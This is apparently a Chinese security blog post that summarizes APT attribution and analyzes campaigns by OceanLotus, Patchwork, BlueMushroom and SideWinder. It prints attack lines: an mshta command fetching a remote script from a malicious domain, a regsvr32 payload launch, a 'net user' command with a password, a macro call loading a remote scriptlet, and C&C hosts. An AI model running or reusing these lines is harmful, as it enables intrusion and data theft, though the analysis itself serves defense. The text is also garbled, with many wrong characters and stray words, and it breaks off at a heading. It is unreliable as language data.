[网络安全自学篇] 七十四.APT攻击检测溯源与常见APT组织的攻击案例

时间 2020-05-14 标签网络安全自学篇七十四 74 apt 攻击检测溯源常见 apt 组织攻击案例

这是做者网络安全自学教程系列，主要是关于安全工具和实践操做的在线笔记，特分享出来与博友们学习，但愿您喜欢，一块儿进步。前文分享了WannaCry蠕虫的传播机制，带领你们详细阅读源代码。这篇文章将分享APT攻击检测溯源与常见APT组织的攻击案例，并介绍防护措施。但愿文章对您有所帮助~php

做者做为网络安全的小白，分享一些自学基础教程给你们，主要是关于安全工具和实践操做的在线笔记，但愿您们喜欢。同时，更但愿您能与我一块儿操做和进步，后续将深刻学习网络安全和系统安全知识并分享相关实验。总之，但愿该系列文章对博友有所帮助，写文不易，大神们不喜勿喷，谢谢！若是文章对您有帮助，将是我创做的最大动力，点赞、评论、私聊都可，一块儿加油喔~html

文章目录

三.APT攻击溯源及案例

PS：本文参考了github、安全网站和参考文献中的文章（详见参考文献），并结合本身的经验和实践进行撰写，也推荐你们阅读参考文献。git

做者的github资源：
软件安全：https://github.com/eastmountyxz/Software-Security-Course
其余工具：https://github.com/eastmountyxz/NetworkSecuritySelf-study
Wannacry分析：https://github.com/eastmountyxz/WannaCry-Experimentgithub

声明：本人坚定反对利用教学方法进行犯罪的行为，一切犯罪行为必将受到严惩，绿色网络须要咱们共同维护，更推荐你们了解它们背后的原理，更好地进行防御。web

前文欣赏：
[渗透&攻防] 一.从数据库原理学习网络攻防及防止SQL注入
 [渗透&攻防] 二.SQL MAP工具从零解读数据库及基础用法
 [渗透&攻防] 三.数据库之差别备份及Caidao利器
 [渗透&攻防] 四.详解MySQL数据库攻防及Fiddler神器分析数据包算法

一.什么是APT攻击

APT攻击（Advanced Persistent Threat，高级持续性威胁）是利用先进的攻击手段对特定目标进行长期持续性网络攻击的攻击形式。APT攻击也称为定向威胁攻击，指某组织对特定对象展开的持续有效的攻击活动。这种攻击活动具备极强的隐蔽性和针对性，一般会运用受感染的各类介质、供应链和社会工程学等多种手段实施先进的、持久的且有效的威胁和攻击。chrome

360威胁情报中心结合2018年整年国内外各个安全研究机构、安全厂商披露的重大APT攻击事件，以及近几年来披露的高级持续性威胁活动信息，并基于这些重大APT攻击事件的危害程度、攻击频度、攻击技术等，评选出2018年全球十大APT攻击事件。参考：https://www.secrss.com/articles/7530shell

韩国平昌冬奥会APT攻击事件（攻击组织Hades）
VPNFilter：针对乌克兰IOT设备的恶意代码攻击事件（疑似APT28）
APT28针对欧洲、北美地区的一系列定向攻击事件
蓝宝菇APT组织针对中国的一系列定向攻击事件
海莲花APT组织针对我国和东南亚地区的定向攻击事件
蔓灵花APT组织针对中国、巴基斯坦的一系列定向攻击事件
APT38针对全球范围金融机构的攻击事件
疑似DarkHotel APT组织利用多个IE 0day“双杀”漏洞的定向攻击事件
疑似APT33使用Shamoon V3针对中东地区能源企业的定向攻击事件
Slingshot：一个复杂的网络攻击活动

网络攻击追踪溯源旨在利用各类手段追踪网络攻击的发起者。相关技术提供了定位攻击源和攻击路径，针对性反制或抑制网络攻击，以及网络取证能力，其在网络安全领域具备很是重要的价值。当前，网络空间安全形势日益复杂，入侵者的攻击手段不断提高，其躲避追踪溯源的手段也日益先进，如匿名网络、网络跳板、暗网、网络隐蔽信道、隐写术等方法在网络攻击事件中大量使用，这些都给网络攻击行为的追踪溯源工做带来了巨大的技术挑战。数据库

传统的恶意代码攻击溯源方法是经过单个组织的技术力量，获取局部的攻击相关信息，没法构建完整的攻击链条，一旦攻击链中断，每每会使得前期大量的溯源工做变得毫无价值。同时，面对可持续、高威胁、高复杂的大规模网络攻击，没有深刻分析攻击组织之间的关系，缺少利用深层次恶意代码的语义知识，后续学术界也提出了一些解决措施。

为了进一步震慑黑客组织与网络犯罪活动，目前学术界和产业界均展开了恶意代码溯源分析与研究工做。其基本思路是：

同源分析： 利用恶意样本间的同源关系发现溯源痕迹，并根据它们出现的先后关系断定变体来源。恶意代码同源性分析，其目的是判断不一样的恶意代码是否源自同一套恶意代码或是否由同一个做者、团队编写，其是否具备内在关联性、类似性。从溯源目标上来看，可分为恶意代码家族溯源及做者溯源。
家族溯源： 家族变体是已有恶意代码在不断的对抗或功能进化中生成的新型恶意代码，针对变体的家族溯源是经过提取其特征数据及代码片断，分析它们与已知样本的同源关系，进而推测可疑恶意样本的家族。例如，Kinable等人提取恶意代码的系统调用图，采用图匹配的方式比较恶意代码的类似性，识别出同源样本，进行家族分类。
做者溯源： 恶意代码做者溯源即经过分析和提取恶意代码的相关特征，定位出恶意代码做者特征，揭示出样本间的同源关系，进而溯源到已知的做者或组织。例如，Gostev等经过分析Stuxnet与Duqu所用的驱动文件在编译平台、时间、代码等方面的同源关系，实现了对它们做者的溯源。2015年，针对中国的某APT攻击采用了至少4种不一样的程序形态、不一样编码风格和不一样攻击原理的木马程序，潜伏3年之久，最终360天眼利用多维度的“大数据”分析技术进行同源性分析，进而溯源到“海莲花”黑客组织。

这里推荐做者的前一篇基础文章 “[网络安全自学篇] 三十五.恶意代码攻击溯源及恶意样本分析”，这篇文章将从案例的角度进行更深刻的讲解，也感谢全部参考的安全大厂和大佬，正是由于有他们，咱们国家的网络安全才有保障！

二.常见APT组织的攻击案例

1.海莲花（APT32）

海莲花（OceanLotus）是一个据称越南背景的APT组织，又称APT3二、OceanLotus。该组织最先于2015年5月被天眼实验室所揭露并命名，其攻击活动最先可追溯到2012年4月，攻击目标包括中国海事机构、海域建设部门、科研院所和航运企业，后扩展到几乎全部重要的组织机构，并持续活跃至今。实际上，根据各安全厂商机构对该组织活动的拼图式揭露，海莲花团伙除针对中国发起攻击以外，其攻击所涉及的国家分布很是普遍，包括越南周边国家，如柬埔寨、泰国、老挝等，甚至包括越南的异见人士、媒体、地产公司、外资企业和银行。

海莲花组织经常使用攻击方法
- 构造诱饵文件欺骗用户点击
- 利用钓鱼邮件进行攻击，钓鱼关键字包括培训、绩效、监察等
- 采用恶意文件投递的鱼叉攻击
- CHM诱饵、白加黑诱饵、恶意Ink
- 利用CVE漏洞（如CVE-2018-20250绑定压缩包）
- 带有VBA宏病毒的Office文档
- 专用木马（Denis家族、CobalStrike、Gh0st）
- hta样本解密并加载后续的附加数据
- C&C域名通讯
攻击手段
- 鱼叉邮件投递内嵌恶意宏的Word文件、HTA文件、快捷方式文件、SFX自解压文件、捆绑后的文档图标的可执行文件等
- 入侵成功后经过一些内网渗透工具扫描渗透内网并横向移动，入侵重要服务器，植入Denis家族木马进行持久化控制
- 经过横向移动和渗透拿到域控或者重要的服务器权限，经过对这些重要机器的控制来设置水坑、利用第三方工具并辅助渗透
- 横向移动过程当中还会使用一些逃避杀软检测的技术：包括白利用技术、PowerShell混淆技术等

下面简单讲解奇安信安全中心和腾讯电脑管家的分析案例。

文章来源
团队：奇安信安全中心
做者：红雨滴、天眼
原文地址：海莲花团伙对中南半岛国家攻击活动的总结：目标、手法及技术演进
团队：腾讯电脑管家
做者：御见
原文地址：海莲花(OceanLotus)2019年针对中国攻击活动汇总
原文地址：海莲花APT组织2019年第一季度针对中国的攻击活动技术揭秘

奇安信安全中心和腾讯电脑管家都是国内最著名的安全团队之一，近年来也屡次曝光了海莲花组织的攻击活动。其研究发现，该组织自发现以来，一直针对我国的ZF部门、国企等目标进行攻击活动，为近年来对我国大陆进行网络攻击活动最频繁的APT组织。从攻击的手法上看，该组织主要采用电子邮件投递诱饵的方式，包括攻击诱饵文档、Payload加载、绕过安全检测等技术，一旦得到一台机器的控制权后，当即对整个内网进行扫描和平移渗透攻击等。

同时，该组织针对不一样的机器下发不一样的恶意模块，使得即使恶意文件被安全厂商捕捉到，也由于无相关机器特征而没法解密最终的Payload，没法知晓后续的相关活动。活动钻石模型以下：

(1) 诱饵文档初始攻击
恶意文件投递的方式依然是最经常使用的鱼叉攻击的方式，钓鱼关键字包括干部培训、绩效、工做方向等，相关的邮件以下。此外，投递钓鱼邮件的帐号有网易邮箱，包括126邮箱和163邮箱，帐号样式为：名字拼音+数字@163（126）.com，如：Sun**@126.com、reny**@163.com等。

2019年投递的恶意诱饵类型众多，包括白加黑、lnk、doc文档、带有WinRARACE（CVE-2018-20250）漏洞的压缩包等，以后的攻击中还新增了假装为word图标的可执行文件、chm文件等。

白加黑诱饵： 病毒假装成一个DLL文件，假装为Word图标的可执行文件启动的同时，病毒DLL也会被加载启动（也叫DLL劫持）。使用DLL侧加载（DLL Side-Loading）技术来执行载荷，通俗的讲就是咱们常说的白加黑执行。

带有宏的恶意office文档

恶意lnk

带有WinRAR ACE（CVE-2018-20250）漏洞的压缩包。做者以前分享过该CVE漏洞，当咱们解压文件时，它会自动加载恶意程序至C盘自启动目录并运行。

(2) 恶意文件植入
恶意文件植入包括恶意lnk、使用rundll32加载恶意dll、带有宏的doc文档、白加黑、带有WinRAR ACE（CVE-2018-20250）漏洞的压缩包等。

①恶意lnk分析
该组织会在全部投递的压缩包里存放一个恶意的lnk，可是全部的lnk文件都相似（执行的地址不一样，但内容一致），lnk文件的图标假装成word图标。值得注意的是，该lnk的图标会从网络获取，所以若是远程服务器已经关闭，会致使该lnk无图标的现象。此外，还会形成即使不双击lnk，只要打开lnk所在的目录，就会出现网络链接的现象。

该现象的缘由是：Explorer解析lnk的时候会去解析图标，而这个lnk配置的图标在网络上，所以会自动去下载，但只是下载而不会执行，看一眼不运行lnk文件的话，会泄漏自身IP地址，但不会致使电脑中木马。

双击运行lnk后，会执行下列命令：

C:\Windows\SysWOW64\mshta.exe http://api.baidu-json.com/feed/news.html

其中， news.html实际为一个vbs脚本文件。mstha执行此脚本后会解密脚本中存储的内容，并存储到%temp%目录下，包括tmp、exe、log、env文件。

接着调用系统自带的odbcconf.exe，将7b95ffab-3a9c-494a-a584-9c48dc7aa6a7.tmp（dll文件）给加载起来。最后调用taskkill.exe，结束mshta.exe进程。

②带有宏的doc文档
带有宏的文档的投递是该组织比较经常使用的恶意诱饵，如推特上安全同仁曝光该组织的诱饵。

执行宏后，首先会复制原始文档到%temp%下，命名为随机名文件，而后解密出一个新的VBA宏。

接着将HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word\Security\AccessVBOM的注册表值设置为1。

打开以前复制的doc文件，并将原始VBA宏擦除，把解密后的新VBA宏添加进去，接着启动VBA宏函数x_N0th1ngH3r3。x_N0th1ngH3r3函数一样解密出一段新VBA宏，一样调用新VBA宏的x_N0th1ngH3r3函数。

解密出来的新VBA宏目的是将shellcode解密并加载执行。

Shellcode解密出一个DLL文件，并在内存中加载，执行DllEntry函数。DllEntry函数先会提取资源文件，并解密出来。

解密出来的内容包括最终rat和相关配置信息。

随后会将解密的rat在内存中展开，而且查找CreateInstance函数地址，而后将配置信息传入调用该函数。

配置的4个C&C使用https进行通讯链接，其余的技术细节同文章同以前御见发布的海莲花的分析文章。

cloud.360cn.info
dns.chinanews.network
aliexpresscn.net
chinaport.org

③白加黑
白加黑一样是该组织经常使用的诱饵类型，而且在实际攻击过程当中，还屡次使用。使用dll侧加载（DLL Side-Loading）技术来执行载荷，通俗的讲就是咱们常说的白加黑执行。其基本流程以下图所示：

其中所使用的宿主文件对包括：

如攻击首先使用了word的主程序为白文件，加载恶意文件wwlib.dll。

释放诱饵文档到临时目录并打开。

而后再次使用白加黑的技术，使用360se的主程序作为白文件，加载恶意的chrome_elf.dll。

chrome_elf.dll功能除了实现调用原始默认程序打开txt、doc文件外，还会链接网络下载下一阶段的恶意文件并在内存中直接执行。

注意：在进行恶意样本分析时，咱们不要去访问这些恶意网站，撰写报告也建议增长隔离字符防止被访问。下载地址为：[https:]//officewps.net/cosja.png，其余的恶意样本下载地址如：[https:]//dominikmagoffin.com/subi.png，[https:]//ristineho.com/direct.jpg等。

下载的木马是一个直接可看成代码执行的shellcode，下载后直接在内存中执行。

shellcode的功能是解压解密出一个功能自加载的PE文件。

该PE文件是CobaltStrike木马，和以前海莲花组织使用的该木马彻底同样。

④带有WinRAR ACE（CVE-2018-20250）漏洞的压缩包
该压缩包解压后，会解压出有模糊图片处理的doc文档。除了解压出压缩的文件后，还会在启动目录释放一个自解压文件：

C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\StartMenu\Programs\Startup

解压后会有一个{7026ce06-ee00-4ebd-b00e-f5150d86c13e}.ocx文件，而后执行命令regsvr32 /s /i {7026ce06-ee00-4ebd-b00e-f5150d86c13e}.ocx执行。

该ocx的技术细节同前面宏文档的内存dll的部分分析，此处就再也不赘述。

⑤经过com技术执行
经过com技术，把某恶意dll注册为系统组建来执行：

⑥Chm内嵌脚本
Chm执行后，会提示执行ActiveX代码。

其脚本内容为：

(3) 下发文件分析及定制化后门
在攻击者攻陷机器后，攻击者还会持续对受控机进行攻击：会经过脚本释放新的与该机器绑定木马，此木马主要经过两种加载器（定制后门）实现只能在该机器上运行，加载器也是使用白加黑技术，如使用googleupdate.exe+goopdate.dll，此外的名字还包括如：

KuGouUpdate.exe+goopdate.dll
AdobeUpdate.exe+goopdate.dll
Bounjour.exe+goopdate.dll

①加载器1分析
原理示意图以下：

木马执行后分配内存空间，拷贝shellcode到新申请的空间中执行，shellcode的功能则是利用配置密码+本地计算机名的hash做为密钥解密最终的playload。

接着对playload进行校验，成功后建立新线程执行playload。

②加载器2分析
原理图以下：

加载器2是在加载器1的基础上增长了一层随机密钥的加密，更好地对抗安全软件的检测扫描，且经过挂钩API函数然乱木马执行流程来干扰自动化沙箱的分析。

首先在dll入口点处hook LdrLoadDll函数，当调用该API时接管执行流程执行解密代码，经过内置的随机密码解密shellcode，shellcode的功能则是利用配置密码+本地计算机名的hash做为密钥解密最终的playload，并对playload进行校验，成功后建立新线程执行playload。

Shellcode行为同loader1解密出的shellcode一致。

最终的playload有三种，都是海莲花经常使用的木马，分别为CobaltStrike、Gh0st、Denis。

RAT1：CobaltStrike
RAT2：Gh0st改版
该木马疑似使用开源木马gh0st改版，支持tcp和upd，数据包使用zlib压缩。
RAT3：Denis

(4) 提权和横向移动
此外，还发现海莲花还会不断的对被攻击的内网进行横向移动，以此来渗透到更多的机器。利用nbt.exe扫描内网网段，其可能经过收集凭据信息或暴力破解内网网络共享的用户和密码，如：

C:\\WINDOWS\\system32\\cmd.exe/C nbt.exe 192.168.1.105/24

经过net user等相关命令查看或访问内网主机，如：

net user\\192.168.1.83\C#3 /U:192.168.1.183\Administrator 123456
NTLM hash

此外，在上段所述的加密的前缀中，咱们还发现了一个ip：210.72.156.203作为加密前缀，咱们从腾讯安图查询可见。

能够发现，能关联到nbtscan-1.0.35.exe和mmc.exe，一样跟内网渗透相关。渗透到内网机器后，攻击者还发下发bat和js脚本，来执行后续的操做。脚本名字如encode.js、360se.txt、360PluginUpdater.js、360DeepScanner.js、360Tray.js等。

如360PluginUpdater.bat+360PluginUpdater.js，360PluginUpdater.bat的功能是输出加密脚本到360PluginUpdater.dat，完成后将其重命名为360PluginUpdater.js，并执行。

360PluginUpdater.js是个加密的脚本。

经过一系列解密后最终经过eval执行解密后的脚本。

通过base64解密及范序列化后获得两个对象loader和playload，并在内存中调用loader的LoadShell方法。

loader的pdb为：E:\priv\framework\code\tools\exe2js\loader\obj\Release\loader.pdb，其功能是申请内存，解密加载执行playload：

payload PE头自带加载代码以下：

最终调用ReflectiveLoader实现内存加载dll。

最终为CobaltStrike攻击平台远控。

总结：海莲花组织是近年来针对我国的有关部门进行攻击的最活跃的APT组织之一，它老是在不断的进化，更新他的攻击手法和工具库，以达到绕过安全软件防护的目的。如不断的变换加载方式、混淆方法、多种多样的诱饵形式等，还使用新的Nday进行攻击，如该波攻击中的WinRAR ACE漏洞（CVE-2018-20250）。除了武器库的不断更新，该组织也至关熟悉中国的状况，包括政策、习惯等等，这也使得迷惑相关人员，是的攻击成功增长了成功率。除此，该组织的攻击范围也在不断的扩大，除了有关部门、海事机构、能源单位等外，研究机构所遭受的攻击也在不断的增多，而对我的的攻击，如教授、律师的钓鱼攻击也在不断的进行。所以咱们提醒有关部门及有关机构的工做人员，切实提升国家安全意识，不要被网络钓鱼信息所蒙蔽，以避免给国家安全形成重大损失。

2.摩诃草（APT-C-09）

APT-C-09是南亚印度背景的APT组织，又名摩诃草、白象、PatchWork、 hangOver、The Dropping Elephat、VICEROY TIGER。摩诃草组织主要针对中国、巴基斯坦等亚洲地区国家进行网络攻击活动，其中以窃取重要信息为主。相关攻击活动最先能够追溯到2009年11月，至今还很是活跃。在针对中国地区的攻击中，该组织主要针对ZF机构、科研教育领域进行攻击，其中以科研教育领域为主。摩诃草组织最先由Norman安全公司于2013年曝光，随后又有其余安全厂商持续追踪并披露该组织的最新活动，但该组织并未因为相关攻击行动曝光而中止对相关目标的攻击，相反从2015年开始更加活跃。

摩诃草组织经常使用攻击方法
- 主要以鱼叉邮件进行恶意代码的传播
- 采用水坑方式进行攻击
- 基于即时通信工具和社交网络的恶意代码投递
- 使用钓鱼网站进行社会工程学攻击
- 投递带有恶意宏文件的xls文件
- 钓鱼网站用以捕获信息
- 使用带有诱饵文档经过点击下载托管于GitHub上的downloader样本
- Windows、Mac、Android系统均有针对性攻击
分析缘由
- 远程控制木马包含CNC字段
- 这次活动该组织的特征与之高度相似
- 攻击手法相似

下面简单讲解Gcow安全团队的分析案例。

文章来源
团队：Gcow安全团队
做者：追影小组
原文地址：烈火烧不尽的“恶性毒草”——摩诃草APT组织的攻击活动

Gcow是当前国内为数很少的民间网络信息安全研究团队之一，其讨论氛围浓厚，研究范围普遍，令很多安全爱好者神往！Gcow安全团队追影小组于2019年11月底监测到了该组织一些针对我国医疗部门的活动。直至2020年2月初，摩诃草APT组织经过投递带有恶意宏文件的xls文件，以及使用带有诱饵文档经过点击下载托管于GitHub上的downloader样本，并应用于相应的钓鱼网站以获取QB等一系列活动。这对我国相关部门具备很大的危害，追影小组对其活动进行了跟踪与分析，写成报告供给各位看官更好的了解该组织的一些手法。

(1) 样本分析——诱饵文档“武汉旅行信息收集申请表.xlsm”
该诱饵文档托管于网址http://xxx.com/…B7%E8%A1%A8.xlsm，以下图所示，假装成有关部门的文件。

这是一个含有宏的xlsm电子表格文件，利用社会工程学诱使目标“启用内容”来执行宏恶意代码。提取的宏代码以下：

当目标启用内容后就会执行Workbook_Open的恶意宏代码。

DllInstall False, ByVal StrPtr(Sheet1.Range("X100").Value)

经过加载scrobj.dll，远程调用http://45.xxx.xxx.67/window.sct，这是利用Microsoft系统文件的LOLbin以绕过杀软的监测，达到远程执行代码。其中Sheet1.Range(“X100”).Value是小技巧，将Payload隐藏在Sheet1中，经过VBA获取下载地址，起到必定混淆保护的效果。

接着分析恶意sct文件(windows.sct)。
经过windows.sct下载到启动目录，并重名为Temp.exe，运行该程序以下图所示。

系统启动文件夹以下图：

最后是后门分析(msupdate.exe)，文件信息以下。

其主要功能包括：

自身拷贝到当前用户的AppData\Roaming和C:\Microsoft目录下，重命名msupdate.exe并建立写入uuid.txt，来标识不一样用户。
经过com组件建立计划任务，实现持久化控制。
与服务器进行C&C通信，实现了shell文件上传与下载(ftp)，获取屏幕快照功能，达到彻底控制目标。

获取uuid通知主机上线：

经过http协议与服务器进行通信，并获取相关指令。反向Cmd Shell相关代码以下：

文件上传相关代码：

文件下载相关代码：

屏幕快照相关代码：

(2) 样本分析——诱饵文档“卫生部指令.docx”
该文档托管于http://xxx.com/h_879834932/…87%E4%BB%A4.docx网址，诱使目标点击提交按钮，触发Shell.Explorer.1从Internet Explorer下载并运行submit_details.exe木马程序。

其功能主要包括：

创建计划任务
收集目标机器名、IP等信息
下载后门程序，经过Github白名单下载文件，绕过IDS检测
获取Github上的文件下载路径，目前文件已被删除

总结：在此次活动中摩诃草组织为了增长其攻击活动的成功性，在诱饵文档中使用了某部门的名称和某部门的徽标以增长其可信性，同时在其托管载荷的网站上引用了nhc这个字符串。Gcow安全团队追影小组在此大胆推测，该组织使用鱼叉邮件的方式去投递含有恶意文档url的邮件。同时在此次活动中所出现的url上也存在“nhc”、“gxv”、“cxp”等字眼，这很大的反应出攻击者对中国元素的了解，社会工程学的使用灵活以及拥有必定的反侦查能力，这无疑是对我国网络安全的一次挑战，还请相关人士多多排查，培养员工安全意识也是重中之重的。

3.蓝宝菇（APT-C-12）

360公司在2018年7月5日首次对外公开了一个从2011年开始持续近8年针对我国行政机构、科研、金融、教育等重点单位和部门进行攻击的高级攻击组织蓝宝菇（APT-C-12），英文名BlueMushroom，该组织的活动在近年呈现很是活跃的状态。好比，经过向163邮箱发送鱼叉邮件，钓鱼邮件仿冒博鳌亚洲论坛向攻击对象发邀请函。攻击者经过诱导攻击对象打开鱼叉邮件云附件中的LNK文件，一旦攻击对象被诱导打开LNK快捷方式文件，会执行文件中附带的PowerShell恶意脚原本收集上传用户电脑中的重要文件，并安装持久化后门程序长期监控用。

蓝宝菇组织经常使用攻击方法
- 主要以鱼叉邮件攻击为主
- 执行恶意PowerShell脚本收集信息
- 云附件LNK文件
- 安装持久化后门程序长期监控用户计算机
- 使用AWS S3协议和云服务器通讯来获取用户的重要资料
- 投递带有恶意宏文件的xls文件
- 压缩包解压后包含名为beoql.g的DLL后门
- 横向移动恶意代码，C&C访问
攻击手段
- 鱼叉邮件投递内嵌PowerShell脚本的LNK文件，并利用邮件服务器的云附件方式进行投递
- 当受害者被诱导点击恶意LNK文件后，会执行LNK文件所指向的PowerShell命令，进而提取出LNK文件中的其余诱导文件、持久化后门和PowerShell后门脚本
- 从网络上接受新的PowerShell后门代码执行，从而躲避了一些杀软的查杀

下面简单讲解360安全团队的分析案例。

文章来源
团队：360安全、奇安信
做者：追日团队、360安全监测与响应中心、360威胁情报中心
原文地址：蓝宝菇（APT-C-12）针对性攻击技术细节揭秘
原文地址：蓝宝菇(APT-C-12)最新攻击样本及C&C机制分析

(1) 鱼叉邮件及诱饵文档
360威胁情报中心确认多个政企机构的外部通讯邮箱被投递了一份发自boaostaff[@]163.com的鱼叉邮件，钓鱼邮件仿冒博鳌亚洲论坛向攻击对象发送了一封邀请函，以下图所示。

邮件附件被放到163的云附件里，此附件即为攻击者的恶意Payload，这是一个经过RAR打包的快捷方式样本。接下来咱们对同一波攻击中的另外一个彻底相同功能的样本进行详细分析，以梳理整个攻击过程。附件内容以下：

一旦攻击对象被诱导打开该LNK快捷方式文件，LNK文件便会经过执行文件中附带的PowerShell恶意脚原本收集上传用户电脑中的重要文件，并安装持久化后门程序长期监控用户计算机。

(2) Dropper分析
附件压缩包内包含一个LNK文件，名字为《政法网络舆情》会员申请.lnk，查看LNK文件对应的目标以下：

能够看到目标中并无任何可见字符，使用二进制分析工具查看LNK文件能够看到PowerShell相关的字符串，以及不少Unicode不可见字符。

经过分析LNK文件格式中几个比较重要的结构，完整还原出样本真实执行的恶意目标，其中涉及3个LNK文件格式的重要结构：LinkTargetIDList、COMMAND_LINE_ARGUMENTS和Environment Varable Data Block。

LinkTargetIDList： 该结构是一个数组，用于标记具体的快捷方式的连接目标，而样本中多个LIST里的元素拼接起来才是快捷方式的具体连接目标，经过调试能够看到目标路径和LinkTargetIDList拼接出来的结果一致。
CLSID_MyComputer\C:\Windows\system32\windOW~1\V1.0\POwersHELl.exe

COMMAND_LINE_ARGUMENTS： 该选项为目标程序的参数。样本中的目标程序参数则为具体须要执行的PowerShell恶意代码，另外因为在参数中包含了大量的不可显示Unicode字符，从而致使右键打开快捷方式时目标中并不会包含对应的PowerShell代码。

EnvironmentVarableDataBlock： 当连接目标程序涉及到环境变量时会使用。该值设置后会致使具体的快捷方式中的目标被设置为对应的 Environment Varable Data Block值，可是须要注意的是，样本中Environment Varable Data Block对实际的程序调用并不起做用（删除并不影响最终的样本启动），最终Shell32.dll靠解析LInkTargetIDList数组来启动PowerShell。

(3) Payload和PowerShell脚本分析
将LNK文件指向执行的PowerShell脚本解密，该PowerShell命名为ps_origin，代码以下，PowerShell脚本会定位执行LNK文件的最后一行。

文件最后一行通过Base64编码，解码后的数据为[压缩包+PowerShell脚本]的形式。

将最后的PowerShell脚本解密后以下，名称为ps_start。

ps_start： 被解密后的LNK文件最后一行PowerShell脚本中的ps_start会被首先执行，该PowerShell脚本主要用于解压出后续的压缩包，并继续运行其中的脚本。同时压缩包包含了相应的文件窃取模块，以下图所示脚本经过[convert]::frombase64string((gc $a|select -l 2|select -f 1))); 以Base64解密出对应的压缩包文件，以后使用Rundll32加载其中beoql.g后门文件（加载函数为DllRegister），同时将一段PowerShell脚本做为参数传入，该PowerShell命名为ps_loader。

压缩包解压后包含名为beoql.g的DLL后门、合法的Rar.exe压缩工具、以及真实呈现给用户的诱导DOC文档。

脚本会尝试访问如下3个IP地址，以确保C&C存活：

159.65.127.93
139.59.238.1
138.197.142.236

若确认C&C存活，则经过命令行收集系统的基本信息。

脚本获取基本信息后，再经过Rar.exe压缩为start.rar文件，以后使用RSA算法加密一个随机字符串e。最后脚本会遍历系统中指定的后缀文件（jpg, txt, eml, doc, xls, ppt, pdf, wps, wpp, 只获取180天之内的文件），继续使用Rar.exe压缩获取的指定文件，密码为以前生成的变量e。

函数pv9会将对应的RAR文件经过AWS S3 存储协议上传到一个网上的云服务商的地址：0123.nyc3.digitaloceanspaces.com，代码中包含的ACCESS_KEY和SECRET_KEY疑似亚马逊S3云服务存储协议所使用的相关KEY信息。

样本中使用该协议不过是添加一些跟服务端协商的请求头，请求头的value是用AWS s3 V4签名算法算出来的，通讯流程由函数ul3和ig3完成，最终完成上传文件。ps_start中加载执行DLL后门后会从内置的三个IP地址中选择一个做为C&C，再次下载一段PowerShell，此处称之为ps_loader。

ps_loader： 首先生成用于请求的对应的us及Cookie字段，具体请求以下所示，能够看到返回的数据是一系列的十进制字符。

接着对返回数据进行简单的初始化后，经过函数sj8对数据进行解密，能够看到攻击者使用了whatthef**kareyoudoing这个极富外国色彩的调侃俚语做为秘钥。解码后的内容也是一段PowerShell，此处命名为ps_backdoor，ps_backdoor会调用其对应的函数ROAGC。

该脚本还支持CMD命令功能，除了Windows外，还支持Linux下的命令执行：

(4) 持久化分析
ps_start脚本会使用Rundll32.exe加载执行样本中解压出来的beoql.g后门文件，该DLL为一个实现恶意代码持久化加载的模块，用于加载ps_loader，并经过修改LNK文件来实现持久化，其导出的函数以下所示：

经过分析，DLL具体函数功能以下：

另外，ps_start中会直接调用该DLL的导出函数DllRegister，参数为对应的ps_loader脚本，函数首先会将ps_loader加密保存为beoql.g.ini，以后调用DllEntry和fun_Callinstall。

具体流程以下：

beoql.g.ini加密保存为PowerShell
DllEntry被调用首先会经过CMD命令删除相关的金山安全组件，以后经过CreateProcess函数启动ps_loader脚本
fun_Callinstall中解密出对应的加密字符，字符串为经过Rundll32.exe调用导出函数DllInstall
DllInstall函数首先遍历多个目录下的LNK文件，以后生成nview32_update.bat脚本并运行
nview32_update.bat脚本执行后会检测并删除WPS的相关组件，以后对前面遍历获取的LNK文件进行修改操做。首先经过调用导出函数DllCopyClassObject将该LNK文件拷贝到临时目录，再经过函数DllSetClassObject修改%temp%目录下的LNK文件，最后将修改过的LNK文件拷贝覆盖回去
DllSetClassObject中经过函数fun_Changelnk修改默认的LNK文件

具体效果以下所示，LNK快捷方式文件被修改成经过Rundll32.exe调用该DLL的DllEntry函数，该函数的主要功能如前文所示用于运行对应的ps_loader脚本，经过劫持LNK快捷方式文件来起到持久化的做用。

总结：蓝宝菇组织的相关恶意代码中出现特有的字符串（Poison Ivy密码是：NuclearCrisis），结合该组织的攻击目标特色，360威胁情报中心将该组织的一系列攻击行动命名为核危机行动（Operation NuclearCrisis）。联想到核武器爆炸时的蘑菇云，360威胁情报中心结合该组织的其余特色，以及对APT组织的命名规则，将该组织名为蓝宝菇。威胁情报在攻防对抗中发挥着愈来愈重要的做用，威胁情报不是简单的从blog、twitter等公开渠道得到开源情报。从本次事件中能够看出，只有具有扎实的安全能力、创建强大的数据基础并对威胁情报涉及的采集、处理、分析、发布、反馈等一系列的环节进行较长时期的投入建设，才能得到基于威胁情报的检测、分析、响应、预警等关键的安全能力。

4.SideWinder（T-APT-04）

T-APT-04是国际知名的SideWinder“响尾蛇”组织，该南亚组织以窃取单位、能源、军事、矿产等领域的重要信息为主，此前已对巴基斯坦和东南亚各国发起过屡次攻击，但近两起的APT攻击却频繁指向了中国，一块儿是假装成国家部门向各国驻华使馆发送虚假邀请函；另外一起是针对某科技有限公司驻外表明处的攻击事件，攻击者向该公司驻外表明处发送了虚假的安全和保M手册。据瑞星安全研究院分析，经过对攻击者使用的技术手法来看，判定与APT组织“响尾蛇”有着莫大的关系。

响尾蛇组织经常使用攻击方法
- 利用Office远程代码执行漏洞（cve-2017-11882）
- 经过钓鱼邮件发起APT攻击
- 远程控制目标电脑并获取内部资料
- 使用钓鱼网站进行社会工程学攻击
- 诱饵文档进行载荷投递
攻击手段
- 假装文档并嵌入木马发送（如假装成国家单位的邀请函）
- 文件存放至指定目录并解密
- ShellCode将公式编辑器的命令行参数改为JavaScript脚本并执行

下面简单讲解瑞星团队发布至Freebuf的分析案例。

文章来源
团队：瑞星团队发布至Freebuf
做者：瑞星
原文地址：境外APT 组织“响尾蛇”对我国发起攻击事件报告

瑞星公司是中国互联网著名的安全公司，其瑞星杀毒软件也是国内外颇有安全保障的杀毒软件之一，他们发布的文章或报告都很是有价值，你们也都应该不陌生。近日，瑞星安全研究院捕获到两起针对中国的APT攻击事件，一块儿是针对各国驻华大使馆，另外一起是针对某科技有限公司驻外表明处。攻击者利用Office远程代码执行漏洞（cve-2017-11882）经过钓鱼邮件等方式发起APT攻击，一旦有用户打开钓鱼文档，电脑就会被攻击者远程控制，从而被盗取如电脑系统信息、安装程序、磁盘信息等重要数据资料，其目的以盗取我国重要数据、隐私信息及科研技术为主。攻击流程以下图所示：

(1) 钓鱼邮件分析
